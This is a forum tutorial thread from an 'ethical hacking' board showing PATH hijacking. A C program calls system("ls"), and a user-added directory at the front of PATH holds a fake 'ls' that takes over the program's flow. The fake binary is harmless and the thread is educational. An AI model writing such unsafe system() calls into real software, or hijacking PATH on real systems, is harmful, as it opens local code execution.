1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How to exploit system() call in C

Discussion in 'Ethical hacking Tips' started by lionaneesh, Feb 9, 2011.

  1. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    Unix/Linux/Windows systems uses PATH variable to look up the standard bin files of the inbuilt command in the Shell...This PATH variable can be changed and thus we can change the flow of a program using system() call...How? This we'll be seeing in this tutorial..

    Method



    We'll be using a basic C Program for demonstarting our article..

    system.c
    Code:
    #include<stdio.h>
    
    
    
    int main()
    
    {
    
            system("ls");
    
            return(0);
    
    }
    
    Compiling

    Code:
    gcc system.c -o system
    
    
    Running

    Code:
    aneesh@aneesh-laptop:~/articles/C$ ./.system 
    
    buggyProgram	format	  getSrc  stack2    stack.c  system.c  test
    
    buggyProgram.c	format.c  stack   stack2.c  system   system.x  test.c
    
    
    lets echo the PATH variable and know what it contains

    Code:
    aneesh@aneesh-laptop:~$ echo $PATH
    
    /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
    
    
    This means that the each command we enter into the shell is searched in the above PATH's..

    So lets change it and add our own path at the beginning..

    Code:
    aneesh@aneesh-laptop:~$ PATH=$HOME/articles:$PATH
    
    
    We added $HOME/article at the beginning of the path variable...
    Now lets add a program named 'ls' in the $HOME/articles directory...

    Code:
    aneesh@aneesh-laptop:~$ cd $HOME/articles
    
    
    ls.c
    Code:
    #include<stdio.h>
    
    
    
    int main()
    
    {
    
    	printf("Hello World!!\n");
    
    	return(0);
    
    }
    
    
    Compiling

    Code:
    gcc ls.c -o ls
    
    Now that we have a file named 'ls' and the PATH variable Changed. So , now we are ready to exploit the system.c program...

    Lets run it now...

    Code:
    aneesh@aneesh-laptop:~/articles/C$ ./system 
    
    Hello World!!
    
    
    Yupi!!!We did it again...We just exploited the system.c program to change its normal Program Flow..
     
  2. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    Thanks for accepting..
    All the viewers please comment..
     
  3. tirdbe

    tirdbe New Member

    Joined:
    Feb 16, 2011
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    I am a beginner in this field.
    What is a program c.
    How can I enter in program c
     
  4. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    Sorry cant understand your question fully but i am assuming that you wanted to ask...What is C and how to program in C...

    C is a Powerful Programming Language...
    It was made in late 1970's by Dennis Ritchie and Bell Labs for the Unix systems...
    It gained a lot of popularity and till today also is one of the most popular programming language...

    Programming in C is a long journey but full of excitement and Interesting memory leaks !! (;););)) ...

    For more info Click Here!!
     
  5. nicolerisse

    nicolerisse Banned

    Joined:
    Feb 18, 2011
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    0
    I don´t understand a single word...
     
  6. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    Please specify what you don't understand and what you want more in the article...
     

Share This Page